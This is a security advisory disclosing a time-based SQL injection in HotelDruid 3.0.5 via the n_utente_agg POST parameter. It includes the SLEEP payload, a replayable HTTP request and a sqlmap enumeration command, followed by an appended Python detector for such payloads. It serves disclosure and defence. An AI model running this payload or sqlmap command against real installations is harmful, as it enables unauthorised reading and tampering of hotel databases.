Affected Version: hoteldruid version 3.0.5

Product Link: https://www.hoteldruid.com/

Product Download Link: https://www.hoteldruid.com/download/hoteldruid_3.0.5.zip

Security Issue:

SQL injection via POST parameter n_utente_agg

URL: http://localhost/hoteldruid/interconnessioni.php
Method: POST
Vulnerable Parameter: n_utente_agg
Payload: 1' AND (SELECT 3869 FROM (SELECT(SLEEP(5)))qSXB)-- QMbZ

Vulnerability Description:

SQL injection (SQLi) is an injection attack in which an attacker supplies input that is interpreted as part of a SQL statement, allowing arbitrary queries to be executed against the web application's database server. Here the value of the n_utente_agg form field is concatenated into a query without sanitization or parameterization, so a crafted value such as the time-based payload above changes the query's logic (the SLEEP(5) call delays the response when the injected condition is evaluated).

Process to reproduce:

1. Copy the HTTP request below.
2. Save it as sqli_1.txt.
3. Run the sqlmap command below to see the data extracted from the database.

HTTP Request:

POST /hoteldruid/interconnessioni.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: http://localhost/hoteldruid/
Content-Length: 515
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"

2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_interconnessione"

SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_utente_agg"

SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="n_utente_agg"

1' AND (SELECT 3869 FROM (SELECT(SLEEP(5)))qSXB)-- QMbZ
------------YWJkMTQzNDcw--

HTTP Response:

[screenshot not reproduced in this text]

Proof of Exploit:

SQL query: SELECT database()
Result: hoteldruid

Screenshot:

[screenshot not reproduced in this text]

Command used: sqlmap -r sqli_1.txt -p n_utente_agg --risk 3 --level 5 --dbs --current-user --current-db

The impact of this vulnerability:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
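As an added defender-side example (not part of this advisory or of the hoteldruid code), the following Python parses the multipart/form-data body of the request above and flags the n_utente_agg field on two indicators of time-based blind SQLi: a delay function call and a quote followed by a SQL comment marker. The sample body is reconstructed inline from the request shown; the indicator regexes and their labels are my own choices.

```python
import re

# Constructed sample, not a capture from the product: the multipart body of
# the request above, reassembled with CRLF line endings.
BOUNDARY = "----------YWJkMTQzNDcw"
PAYLOAD = "1' AND (SELECT 3869 FROM (SELECT(SLEEP(5)))qSXB)-- QMbZ"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="anno"', "", "2023",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="id_sessione"', "",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="modifica_interconnessione"', "", "SI",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="modifica_utente_agg"', "", "SI",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="n_utente_agg"', "", PAYLOAD,
    "--" + BOUNDARY + "--", "",
])

# Delay functions used by time-based blind SQLi on common DBMS engines.
TIME_BASED = re.compile(r"(?i)\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")
# A quote that closes the original string literal, then a comment marker that
# discards the rest of the query. Ordinary text can match too ("it's -- ok"),
# so treat this as a weaker signal than TIME_BASED.
QUOTE_COMMENT = re.compile(r"'.*?(--|#|/\*)", re.S)


def parse_multipart(body: str, boundary: str) -> dict[str, str]:
    # Return {field name: value}; each part is "headers CRLF CRLF value".
    fields = {}
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk.startswith("--"):  # preamble or closing "--"
            continue
        head, _, value = chunk.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value
    return fields


def sqli_indicators(value: str) -> list[str]:
    hits = []
    if TIME_BASED.search(value):
        hits.append("time-based function")
    if QUOTE_COMMENT.search(value):
        hits.append("quote followed by SQL comment")
    return hits


def scan_request(body: str, boundary: str) -> dict[str, list[str]]:
    # Map each suspicious field name to the indicators found in its value.
    flagged = {}
    for name, value in parse_multipart(body, boundary).items():
        hits = sqli_indicators(value)
        if hits:
            flagged[name] = hits
    return flagged
```

Running scan_request on the sample flags only n_utente_agg; the same check can be applied to WAF or access logs that retain POST bodies, and a matching request that also shows a response time of 5 seconds or more is a strong sign the injected SLEEP actually executed.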